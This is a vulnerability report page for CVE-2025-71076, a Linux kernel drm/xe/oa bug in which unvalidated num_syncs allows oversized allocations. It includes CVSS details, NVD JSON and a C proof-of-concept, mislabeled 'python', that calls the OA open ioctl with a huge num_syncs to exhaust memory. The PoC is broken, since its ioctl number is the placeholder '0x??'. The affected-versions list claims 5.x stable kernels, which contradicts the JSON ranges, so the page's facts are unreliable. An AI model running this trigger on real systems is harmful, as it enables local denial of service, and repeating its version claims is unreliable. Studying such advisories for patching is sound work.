Security Vulnerability Report
中文
CVE-2025-71076 CVSS 5.5 MEDIUM

CVE-2025-71076

Published: 2026-01-13 16:16:07
Last Modified: 2026-03-25 19:00:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: drm/xe/oa: Limit num_syncs to prevent oversized allocations The OA open parameters did not validate num_syncs, allowing userspace to pass arbitrarily large values, potentially leading to excessive allocations. Add check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS, returning -EINVAL when the limit is violated. v2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh) (cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel drm/xe/oa (vulnerable before commit e057b2d2b8d815df3858a87dffafa2af37e5945b)
Stable kernel versions: 5.15.x, 5.10.x, 5.4.x (需要确认具体受影响版本)
Linux kernel mainline (affected prior to fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-71076 PoC - Linux Kernel drm/xe/oa num_syncs Validation Bypass * * This PoC demonstrates the vulnerability where unvalidated num_syncs parameter * in the OA open ioctl can lead to excessive memory allocation. * * Note: This is a proof-of-concept for educational purposes only. * Running this may cause system instability or crash. * * Requirements: * - Intel Xe graphics hardware (or xe driver module loaded) * - Local access to /dev/dri/cardX */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <stdint.h> /* Structure definition based on DRM_XE_OA_OPEN ioctl */ struct drm_xe_oa_open { uint32_t flags; uint32_t oa_unit; uint32_t num_syncs; /* Unvalidated parameter - vulnerability */ uint64_t syncs; /* Pointer to sync objects */ uint32_t ctx_id; uint32_t reserved0; uint64_t reserved1[4]; }; #define DRM_IOCTL_XE_OA_OPEN 0x?? /* Actual ioctl number */ int main(int argc, char *argv[]) { int fd; struct drm_xe_oa_open args; /* Open the DRM device */ fd = open("/dev/dri/card0", O_RDWR); if (fd < 0) { perror("Failed to open DRM device"); return 1; } /* Initialize args structure */ memset(&args, 0, sizeof(args)); /* * VULNERABILITY: Setting num_syncs to an extremely large value * This should be validated against DRM_XE_MAX_SYNCS but wasn't * before the fix. */ args.num_syncs = 0x7FFFFFFF; /* Large value to trigger excessive allocation */ args.syncs = 0; args.oa_unit = 0; args.flags = 0; printf("CVE-2025-71076 PoC\n"); printf("Attempting to trigger vulnerability with num_syncs=%u\n", args.num_syncs); /* Trigger the vulnerable ioctl */ if (ioctl(fd, DRM_IOCTL_XE_OA_OPEN, &args) < 0) { /* After fix: Should return -EINVAL */ perror("ioctl failed (expected after patch)"); } else { printf("ioctl succeeded - possible vulnerability present\n"); } close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71076", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:07.093", "lastModified": "2026-03-25T19:00:30.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndrm/xe/oa: Limitar num_syncs para prevenir asignaciones sobredimensionadas\n\nLos parámetros de apertura de OA no validaban num_syncs, permitiendo que el espacio de usuario pasara valores arbitrariamente grandes, lo que podría llevar a asignaciones excesivas.\n\nAñadir una comprobación para asegurar que num_syncs no exceda DRM_XE_MAX_SYNCS, devolviendo -EINVAL cuando se viola el límite.\n\nv2: usar XE_IOCTL_DBG() y eliminar la comprobación duplicada. (Ashutosh)\n\n(extraído del commit e057b2d2b8d815df3858a87dffafa2af37e5945b)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.17", "versionEndExcluding": "6.12.64", "matchCriteriaId": "A76F5157-D861-499C-A193-C0CC4D9E0D9C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.